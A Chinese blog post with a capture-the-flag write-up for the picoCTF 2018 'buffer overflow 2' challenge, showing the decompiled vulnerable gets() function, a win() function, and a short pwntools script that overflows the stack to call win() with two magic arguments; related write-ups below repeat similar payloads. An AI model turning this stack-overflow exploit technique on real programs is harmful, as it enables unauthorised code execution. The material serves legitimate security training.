picoctf_2018_buffer overflow 2

于 2023-09-26 16:37:07 发布
阅读量124 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/133315014
版权

picoctf_2018_buffer overflow 2

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32位,只开了NX

很简单的程序

int vuln()
{
  char s[108]; // [esp+Ch] [ebp-6Ch] BYREF

  gets(s);
  return puts(s);
}

栈溢出并且有后门函数

char *__cdecl win(int a1, int a2)
{
  char *result; // eax
  char s[64]; // [esp+Ch] [ebp-4Ch] BYREF
  FILE *stream; // [esp+4Ch] [ebp-Ch]

  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    puts(
      "Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
    exit(0);
  }
  result = fgets(s, 64, stream);
  if ( a1 == 0xDEADBEEF && a2 == 0xDEADC0DE )
    return (char *)printf(s);
  return result;
}

后门函数需要a1 == 0xDEADBEEF && a2 == 0xDEADC0DE

思路

栈溢出返回到后门,然后传参a1,a2即可

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26844,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')

pl=cyclic(0x70)+flat(0x80485CB,0,0xDEADBEEF,0xDEADC0DE)
sla(b'str',pl)
#debug()
ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
计算机安全_Lab 2:Buffer Overflow Vulnerability .pdf
06-04
缓冲区溢出定义为程序尝试将数据写入超出预分配的固定长度缓冲区边界的条件。恶意用户可以利用此漏洞来改变程序的流控制,甚至可以执行任意代码。此漏洞由于数据存储(例如缓冲区)和控制存储(例如返回地址)的混合...
kerio_PF_buffer_overflow.nasl
最新发布
11-08
kerio_PF_buffer_overflow
PicoCTF_2018_buffer_overflow_2详细wp
m0_46204503的博客
11-12 3063
PicoCTF_2018_buffer_overflow_2 知识点 函数调用栈机制(栈溢出) 栈传参 32位程序栈传参,以逆序传入参数,即最后一个参数在最高地址 64位程序前6个参数是寄存器传参,前6个参数分别存在rdi、rsi、rdx、rcx、r8、r9 little trick 如何将一个数转化成底层的二进制的机器码 手算 网上找在线工具,这里不做介绍 在IDA中看汇编代码 因为c代码都可以当做一组汇编指令,比如从上述的0x804861D开始到0x804862D四句汇编指令
PicoCTF_2018_buffer_overflow_2
m0sway的博客
11-29 377
PicoCTF_2018_buffer_overflow_2 使用checksec查看: 开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化 唯一做了变动的是win()函数: 上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1、a2 a1需要等于0xDEADBEEF a2需要等于0xDEADC0DE 才能读取到flag。 那么直接传参即可,秒了。 exp: from pwn import * #start r
BUUCTF pwn——picoctf_2018_buffer overflow 2
CNS-Enterprise BCC-1701-J
05-20 118
BUUCTF 做题练习
picoctf_2018_buffer_overflow_2
z1r0的博客
12-11 186
picoctf_2018_buffer_overflow_2 查看保护 有溢出,还有一个getflag函数,但是想要利用需要给两个参数,结合32位下的系统调用规则即可get flag from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27317) else:
[BUUCTF]PWN——picoctf_2018_buffer overflow 2
BangSen1的博客
03-31 525
picoctf_2018_buffer overflow 2 例行检查,32位,开启NX保护 运行一下, 用IDA打开。看到了flag.txt,跟进一下。 win函数地址为0x80485cb a1 == 0xDEADBEEF && a2 == 0xDEADC0DE 时,输出flag. from pwn import* r=remote('node3.buuoj.cn',26224) payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0x
ring-buffer-design.rar_V2 _buffer_ring_buffer
09-24
2. **原子操作**:如前面所述,CAS操作用于更新指针位置,确保在多线程环境中不会出现数据竞争。CAS操作包含三个参数:当前值、预期值和新值。如果当前值等于预期值,那么更新为新值,否则不做任何操作。 3. **空满...
mktc_Ch3_Buffer
04-02
根据提供的文件内容,本文知识点将围绕“mktc_Ch3_Buffer”的技术细节进行说明。从描述来看,“mktc_Ch3_Buffer”涉及到工控领域的技术和资料,特别是关于缓冲存储器的配置和功能。文件内容提到了“K7F-TC4A缓冲...
drm_mode.rar_UP_dumb buffer
09-23
2. **映射dumb buffer**:分配后的dumb buffer需要映射到用户空间,以便应用程序可以直接访问。这通常通过`drm_mode_map_dumb`函数实现,它将分配的物理内存地址映射到进程的虚拟地址空间。 3. **使用和更新dumb ...
pico ctf 2013 php3,picoCTFのpwn解析
weixin_39895977的博客
03-23 571
前言国庆期间得知了美国CMU主办的picoCTF比赛,出于最近做题的手感有所下降,借此比赛来复习下PWN相关的题型(题目的质量不错,而且题型很广,自我感觉相当棒的比赛)buffer overflow 0先检查一遍文件➜ bufferoverflow0 file vulnvuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), ...
BUUCTF:PicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 906
例行检查程序: 还是32位程序,没有canary,很可能是溢出类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢出漏洞,两次溢出,直接去get shell 第一次溢出去泄露libc地址,第二次溢出get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
BUUCTF picoctf_2018_buffer overflow 2
qq_51821131的博客
10-05 1414
picoctf_2018_buffer overflow 2 检查保护,且为32位 明显栈溢出 找到win函数可以打印flag 整合思路,栈溢出,向win函数传入参数并满足条件即可 from pwn import * p=remote('node4.buuoj.cn',25086) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./PicoCTF_2018_buffer_overflow_2') win=0x080485CB a1=0xDE
[BUUCTF]PWN——picoctf_2018_buffer overflow 1/2
mcmuyanga的博客
11-07 472
picoctf_2018_buffer overflow 1 附件 步骤: 例行检查,32位程序,没开保护 本地运行一下程序,看看程序大概的执行情况 32位ida载入,习惯性的检查程序里的字符串,发现有flag.txt,跟进,找到了读出flag的函数,win_addr=0x80485CB 根据运行时看到的字符串找到了输入点 gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import * r=remote('node3.buuoj.cn',27200) win_a
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 334
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 424
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2
Y_peak的博客
03-17 426
[BUUCTF-pwn]——picoctf_2018_buffer overflow 2 简单的栈溢出,不过需要将参数自己设置而已 注意负数如何转换为补码, 不知道也可以直接在汇编里面找 from pwn import * p = remote('node3.buuoj.cn',28931) a1 = 0xdeadbeef a2 = 0xdeadc0de payload = 'a' * (0x6c + 4) + p32(0x080485CB) + p32(0)+ p32(a1) + p32(a2) p.re
dp_debug_check_buffer_overflow
05-25
dp_debug_check_buffer_overflow 是一个调试函数,用于检测缓冲区溢出的情况。当程序运行时,如果发现有缓冲区溢出的情况,就会触发 dp_debug_check_buffer_overflow 函数,并打印出相应的调试信息,以便程序员进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值